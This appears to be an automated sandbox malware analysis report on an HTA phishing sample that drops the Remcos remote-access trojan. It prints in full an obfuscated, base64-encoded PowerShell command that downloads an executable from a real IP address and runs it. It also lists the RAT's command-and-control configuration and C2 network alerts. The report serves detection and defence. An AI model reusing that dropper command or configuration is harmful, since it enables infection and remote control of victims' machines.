INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1I

                Data Obfuscation

                barindex
                Sigma detected: Dot net compiler compiles file from suspicious location
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sT0NzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI='+[cHAR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2568, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.cmdline", ProcessId: 4820, ProcessName: csc.exe

                Stealing of Sensitive Information

                barindex
                Sigma detected: Remcos
                Source: Registry Key setAuthor: Joe Security: Data: Details: A6 89 47 0A CF A6 55 9D 61 D5 AB 98 62 18 C8 E3 BF 69 23 8D 56 FD F5 35 64 E5 C3 2F 3D C8 4C D2 45 4A 89 04 E2 31 EE 0C 8F 6B 22 F7 F6 45 8D 96 D9 4B 6F 34 96 CC F7 C3 44 22 17 3B 6C EC 11 EA 44 2E DF 83 CC 25 90 FE 93 A4 CC 98 09 D1 BA 8A F1 B4 A5 A6 4A C2 AD 43 12 42 11 AA 89 C2 10 C7 0C 1F 32 A8 5F E1 43 AA 09 8F 73 33 10 69 , EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe, ProcessId: 7088, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-GJDISH\exepath

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-16T17:30:37.463478+010020365941Malware Command and Control Activity Detected192.168.2.449731107.173.4.162560TCP
                2024-12-16T17:30:40.729168+010020365941Malware Command and Control Activity Detected192.168.2.449732107.173.4.162560TCP
                2024-12-16T17:30:43.911956+010020365941Malware Command and Control Activity Detected192.168.2.449734107.173.4.162560TCP
                2024-12-16T17:30:46.979534+010020365941Malware Command and Control Activity Detected192.168.2.449737107.173.4.162560TCP
                2024-12-16T17:30:50.058328+010020365941Malware Command and Control Activity Detected192.168.2.449740107.173.4.162560TCP
                2024-12-16T17:30:53.199623+010020365941Malware Command and Control Activity Detected192.168.2.449742107.173.4.162560TCP
                2024-12-16T17:30:56.518752+010020365941Malware Command and Control Activity Detected192.168.2.449743107.173.4.162560TCP
                2024-12-16T17:30:59.594117+010020365941Malware Command and Control Activity Detected192.168.2.449744107.173.4.162560TCP
                2024-12-16T17:31:02.738356+010020365941Malware Command and Control Activity Detected192.168.2.449745107.173.4.162560TCP
                2024-12-16T17:31:05.840521+010020365941Malware Command and Control Activity Detected192.168.2.449746107.173.4.162560TCP
                2024-12-16T17:31:08.903925+010020365941Malware Command and Control Activity Detected192.168.2.449747107.173.4.162560TCP
                2024-12-16T17:31:12.005673+010020365941Malware Command and Control Activity Detected192.168.2.449748107.173.4.162560TCP
                2024-12-16T17:31:15.057924+010020365941Malware Command and Control Activity Detected192.168.2.449749107.173.4.162560TCP
                2024-12-16T17:31:18.120444+010020365941Malware Command and Control Activity Detected192.168.2.449750107.173.4.162560TCP
                2024-12-16T17:31:21.183831+010020365941Malware Command and Control Activity Detected192.168.2.449752107.173.4.162560TCP
                2024-12-16T17:31:24.262126+010020365941Malware Command and Control Activity Detected192.168.2.449758107.173.4.162560TCP
                2024-12-16T17:31:27.417659+010020365941Malware Command and Control Activity Detected192.168.2.449765107.173.4.162560TCP
                2024-12-16T17:31:30.480124+010020365941Malware Command and Control Activity Detected192.168.2.449776107.173.4.162560TCP
                2024-12-16T17:31:33.563539+010020365941Malware Command and Control Activity Detected192.168.2.449782107.173.4.162560TCP
                2024-12-16T17:31:36.621978+010020365941Malware Command and Control Activity Detected192.168.2.449792107.173.4.162560TCP
                2024-12-16T17:31:39.831861+010020365941Malware Command and Control Activity Detected192.168.2.449799107.173.4.162560TCP
                2024-12-16T17:31:42.909917+010020365941Malware Command and Control Activity Detected192.168.2.449804107.173.4.162560TCP
                2024-12-16T17:31:46.063526+010020365941Malware Command and Control Activity Detected192.168.2.449814107.173.4.162560TCP
                2024-12-16T17:31:49.172233+010020365941Malware Command and Control Activity Detected192.168.2.449820107.173.4.162560TCP
                2024-12-16T17:31:52.246851+010020365941Malware Command and Control Activity Detected192.168.2.449827107.173.4.162560TCP
                2024-12-16T17:31:55.347908+010020365941Malware Command and Control Activity Detected192.168.2.449837107.173.4.162560TCP
                2024-12-16T17:31:58.428007+010020365941Malware Command and Control Activity Detected192.168.2.449843107.173.4.162560TCP
                2024-12-16T17:32:01.557935+010020365941Malware Command and Control Activity Detected192.168.2.449852107.173.4.162560TCP
                2024-12-16T17:32:05.289148+010020365941Malware Command and Control Activity Detected192.168.2.449860107.173.4.162560TCP
                2024-12-16T17:32:08.375879+010020365941Malware Command and Control Activity Detected192.168.2.449868107.173.4.162560TCP
                2024-12-16T17:32:11.645186+010020365941Malware Command and Control Activity Detected192.168.2.449877107.173.4.162560TCP
                2024-12-16T17:32:14.716900+010020365941Malware Command and Control Activity Detected192.168.2.449884107.173.4.162560TCP
                2024-12-16T17:32:17.857163+010020365941Malware Command and Control Activity Detected192.168.2.449894107.173.4.162560TCP
                2024-12-16T17:32:21.078162+010020365941Malware Command and Control Activity Detected192.168.2.449899107.173.4.162560TCP
                2024-12-16T17:32:24.131784+010020365941Malware Command and Control Activity Detected192.168.2.449906107.173.4.162560TCP
                2024-12-16T17:32:27.393382+010020365941Malware Command and Control Activity Detected192.168.2.449915107.173.4.162560TCP
                2024-12-16T17:32:30.366328+010020365941Malware Command and Control Activity Detected192.168.2.449922107.173.4.162560TCP
                2024-12-16T17:32:33.299389+010020365941Malware Command and Control Activity Detected192.168.2.449929107.173.4.162560TCP
                2024-12-16T17:32:36.169190+010020365941Malware Command and Control Activity Detected192.168.2.449938107.173.4.162560TCP
                2024-12-16T17:32:39.032418+010020365941Malware Command and Control Activity Detected192.168.2.449945107.173.4.162560TCP
                2024-12-16T17:32:41.859982+010020365941Malware Command and Control Activity Detected192.168.2.449951107.173.4.162560TCP
                2024-12-16T17:32:44.685978+010020365941Malware Command and Control Activity Detected192.168.2.449959107.173.4.162560TCP
                2024-12-16T17:32:47.466166+010020365941Malware Command and Control Activity Detected192.168.2.449968107.173.4.162560TCP
                2024-12-16T17:32:50.263798+010020365941Malware Command and Control Activity Detected192.168.2.449974107.173.4.162560TCP
                2024-12-16T17:32:53.027684+010020365941Malware Command and Control Activity Detected192.168.2.449980107.173.4.162560TCP
                2024-12-16T17:32:55.731756+010020365941Malware Command and Control Activity Detected192.168.2.449987107.173.4.162560TCP
                2024-12-16T17:32:58.435921+010020365941Malware Command and Control Activity Detected192.168.2.449993107.173.4.162560TCP
                2024-12-16T17:33:01.111052+010020365941Malware Command and Control Activity Detected192.168.2.450003107.173.4.162560TCP
                2024-12-16T17:33:03.754623+010020365941Malware Command and Control Activity Detected192.168.2.450009107.173.4.162560TCP
                2024-12-16T17:33:06.392061+010020365941Malware Command and Control Activity Detected192.168.2.450015107.173.4.162560TCP
                2024-12-16T17:33:09.001423+010020365941Malware Command and Control Activity Detected192.168.2.450022107.173.4.162560TCP
                2024-12-16T17:33:11.627020+010020365941Malware Command and Control Activity Detected192.168.2.450028107.173.4.162560TCP
                2024-12-16T17:33:14.205806+010020365941Malware Command and Control Activity Detected192.168.2.450038107.173.4.162560TCP
                2024-12-16T17:33:16.784252+010020365941Malware Command and Control Activity Detected192.168.2.450044107.173.4.162560TCP
                2024-12-16T17:33:19.329978+010020365941Malware Command and Control Activity Detected192.168.2.450049107.173.4.162560TCP
                2024-12-16T17:33:21.926481+010020365941Malware Command and Control Activity Detected192.168.2.450055107.173.4.162560TCP
                2024-12-16T17:33:24.475070+010020365941Malware Command and Control Activity Detected192.168.2.450059107.173.4.162560TCP
                2024-12-16T17:33:27.049050+010020365941Malware Command and Control Activity Detected192.168.2.450060107.173.4.162560TCP
                2024-12-16T17:33:29.548833+010020365941Malware Command and Control Activity Detected192.168.2.450061107.173.4.162560TCP
                2024-12-16T17:33:32.019962+010020365941Malware Command and Control Activity Detected192.168.2.450062107.173.4.162560TCP
                2024-12-16T17:33:34.467071+010020365941Malware Command and Control Activity Detected192.168.2.450063107.173.4.162560TCP
                2024-12-16T17:33:36.968098+010020365941Malware Command and Control Activity Detected192.168.2.450064107.173.4.162560TCP
                2024-12-16T17:33:39.408042+010020365941Malware Command and Control Activity Detected192.168.2.450065107.173.4.162560TCP
                2024-12-16T17:33:41.846513+010020365941Malware Command and Control Activity Detected192.168.2.450066107.173.4.162560TCP
                2024-12-16T17:33:44.250391+010020365941Malware Command and Control Activity Detected192.168.2.450067107.173.4.162560TCP
                2024-12-16T17:33:46.675082+010020365941Malware Command and Control Activity Detected192.168.2.450068107.173.4.162560TCP
                2024-12-16T17:33:49.064098+010020365941Malware Command and Control Activity Detected192.168.2.450069107.173.4.162560TCP
                2024-12-16T17:33:51.488115+010020365941Malware Command and Control Activity Detected192.168.2.450070107.173.4.162560TCP
                2024-12-16T17:33:53.962241+010020365941Malware Command and Control Activity Detected192.168.2.450071107.173.4.162560TCP
                2024-12-16T17:33:56.377519+010020365941Malware Command and Control Activity Detected192.168.2.450072107.173.4.162560TCP
                2024-12-16T17:33:58.890768+010020365941Malware Command and Control Activity Detected192.168.2.450073107.173.4.162560TCP
                2024-12-16T17:34:01.357874+010020365941Malware Command and Control Activity Detected192.168.2.450074107.173.4.162560TCP
                2024-12-16T17:34:03.826995+010020365941Malware Command and Control Activity Detected192.168.2.450075107.173.4.162560TCP
                2024-12-16T17:34:06.331131+010020365941Malware Command and Control Activity Detected192.168.2.450076107.173.4.162560TCP
                2024-12-16T17:34:08.752658+010020365941Malware Command and Control Activity Detected192.168.2.450077107.173.4.162560TCP
                2024-12-16T17:34:11.163417+010020365941Malware Command and Control Activity Detected192.168.2.450078107.173.4.162560TCP
                2024-12-16T17:34:13.640104+010020365941Malware Command and Control Activity Detected192.168.2.450079107.173.4.162560TCP
                2024-12-16T17:34:16.084200+010020365941Malware Command and Control Activity Detected192.168.2.450080107.173.4.162560TCP
                2024-12-16T17:34:18.650734+010020365941Malware Command and Control Activity Detected192.168.2.450081107.173.4.162560TCP
                2024-12-16T17:34:21.062809+010020365941Malware Command and Control Activity Detected192.168.2.450082107.173.4.162560TCP
                2024-12-16T17:34:23.576702+010020365941Malware Command and Control Activity Detected192.168.2.450083107.173.4.162560TCP
                2024-12-16T17:34:26.009269+010020365941Malware Command and Control Activity Detected192.168.2.450084107.173.4.162560TCP
                2024-12-16T17:34:28.541837+010020365941Malware Command and Control Activity Detected192.168.2.450085107.173.4.162560TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-16T17:30:28.928530+010020220501A Network Trojan was detected192.3.179.16680192.168.2.449730TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-16T17:30:29.310927+010020220511A Network Trojan was detected192.3.179.16680192.168.2.449730TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://192.3.179.166/75/ecome.exeAvira URL Cloud: Label: malware
                Found malware configuration
                Source: 00000006.00000002.4146373644.000000000068E000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["107.173.4.16:2560:1"], "Assigned name": "elvis", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-GJDISH", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ecome[1].exeReversingLabs: Detection: 39%
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeReversingLabs: Detection: 39%
                Multi AV Scanner detection for submitted file
                Source: newthingswithgreatupdateiongivenbestthingswithme.htaReversingLabs: Detection: 15%
                Yara detected Remcos RAT
                Source: Yara matchFile source: 6.2.nicetomeetyousweeet.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.nicetomeetyousweeet.exe.780e67.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.nicetomeetyousweeet.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.3.nicetomeetyousweeet.exe.2210000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.3.nicetomeetyousweeet.exe.2210000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.nicetomeetyousweeet.exe.780e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4146373644.000000000068E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000003.1808435208.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: nicetomeetyousweeet.exe PID: 7088, type: MEMORYSTR
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,6_2_0043293A
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_007B2BA1 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,6_2_007B2BA1
                Source: nicetomeetyousweeet.exeBinary or memory string: -----BEGIN PUBLIC KEY-----

                Exploits

                barindex
                Yara detected UAC Bypass using CMSTP
                Source: Yara matchFile source: 6.2.nicetomeetyousweeet.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.nicetomeetyousweeet.exe.780e67.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.nicetomeetyousweeet.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.3.nicetomeetyousweeet.exe.2210000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.3.nicetomeetyousweeet.exe.2210000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.nicetomeetyousweeet.exe.780e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000003.1808435208.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: nicetomeetyousweeet.exe PID: 7088, type: MEMORYSTR

                Privilege Escalation

                barindex
                Contains functionality to bypass UAC (CMSTPLUA)
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00406764 _wcslen,CoGetObject,6_2_00406764

                Phishing

                barindex
                Yara detected obfuscated html page
                Source: Yara matchFile source: newthingswithgreatupdateiongivenbestthingswithme.hta, type: SAMPLE

                Compliance

                barindex
                Detected unpacking (overwrites its own PE header)
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeUnpacked PE file: 6.2.nicetomeetyousweeet.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.pdb source: powershell.exe, 00000003.00000002.1815577580.0000000004827000.00000004.00000800.00020000.00000000.sdmp
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,6_2_0040B335
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,6_2_0041B42F
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,6_2_0040B53A
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,6_2_004089A9
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00406AC2 FindFirstFileW,FindNextFileW,6_2_00406AC2
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,6_2_00407A8C
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,6_2_00418C69
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,6_2_00408DA7
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0078900E __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,6_2_0078900E
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0078B59C FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,6_2_0078B59C
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0079B696 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,6_2_0079B696
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00787CF3 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,6_2_00787CF3
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00786D29 FindFirstFileW,FindNextFileW,6_2_00786D29
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00798ED0 FindFirstFileW,6_2_00798ED0
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,6_2_00406F06

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49732 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49731 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49737 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49740 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 192.3.179.166:80 -> 192.168.2.4:49730
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49747 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49744 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49748 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49743 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49752 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49746 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49749 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49745 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49750 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49776 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49742 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 192.3.179.166:80 -> 192.168.2.4:49730
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49792 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49758 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49782 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49804 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49799 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49765 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49814 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49827 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49820 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49852 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49837 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49868 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49860 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49877 -> 107.173.4.16:2560
